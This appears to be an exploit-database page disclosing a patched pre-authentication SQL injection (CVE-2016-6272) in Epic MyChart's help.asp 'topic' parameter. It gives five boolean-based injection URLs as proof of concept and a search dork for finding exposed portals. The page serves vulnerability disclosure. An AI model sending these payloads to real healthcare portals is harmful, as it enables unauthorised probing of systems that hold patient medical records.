Lucene search
K

EPIC MyChart - SQL Injection Vulnerability

🗓️ 17 Feb 2018 00:00:00Reported by Shayan SadighType 
zdt
 zdt
🔗 0day.today👁 41 Views

Epic MyChart SQL Injection Vulnerability, Patche

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2016-6272
16 Feb 201800:00
circl
CVE
CVE-2016-6272
20 Feb 201815:00
cve
Cvelist
CVE-2016-6272
20 Feb 201815:00
cvelist
Exploit DB
EPIC MyChart - X-Path Injection
16 Feb 201800:00
exploitdb
exploitpack
EPIC MyChart - X-Path Injection
16 Feb 201800:00
exploitpack
NVD
CVE-2016-6272
20 Feb 201815:29
nvd
Packet Storm
EPIC MyChart X-Path Injection
16 Feb 201800:00
packetstorm
Prion
Sql injection
20 Feb 201815:29
prion
# Exploit Title: Epic Systems Corporation MyChart SQL Injection
# Google Dork: MyChart® licensed from Epic Systems Corporation
# Exploit Author: Shayan Sadigh (http://threat.tevora.com/author/shayan/)
# Vendor Homepage: https://www.epic.com/software
# Software Link: N/A
# Version: N/A
# Tested on: Windows/Unix
# CVE : CVE-2016-6272
 
Epic Systems Corporation MyChart "is a web portal offered by most Epic healthcare organizations that gives you controlled access to the same Epic medical records your doctors use and provides convenient self-service functions that reduce costs and increase satisfaction."
 
The MyChart software uses Intersystems Caché for its DBMS and contains a pre-authenticated SQL injection due to the lack of sanatization for the GE parameter "topic".
 
EPIC was quick to respond to contact and patch the vulnerability in MyChart.
 
Below are two proof of concepts:
 
Proof of concept 1:
 
https://server/mychart/help.asp?topic=COMPONENT^COOKIEENABLE" AND 7900=7900 AND ("LygB"="LygB ===> TRUE (this will show the help topic for enabling cookies)
 
https://server/mychart/help.asp?topic=COMPONENT^COOKIEENABLE" AND 7900=8000 AND ("LygB"="LygB ===> FALSE (will not show)
 
Proof of concept 2 (operations):
 
https://server/mychart/help.asp?topic=COMPONENT^COOKIEENABLE" AND 2*3*8=6*8 OR "000OxPf"="000OxPf ===> TRUE
 
https://server/mychart/help.asp?topic=COMPONENT^COOKIEENABLE" AND 2*3*8=6*6 OR "000OxPf"="000OxPf ===> TRUE (because of the OR)
 
https://server/mychart/help.asp?topic=COMPONENT^COOKIEENABLE" AND 2*3*8=6*6 AND"000OxPf"="000OxPf ===> FALSE

#  0day.today [2018-03-20]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation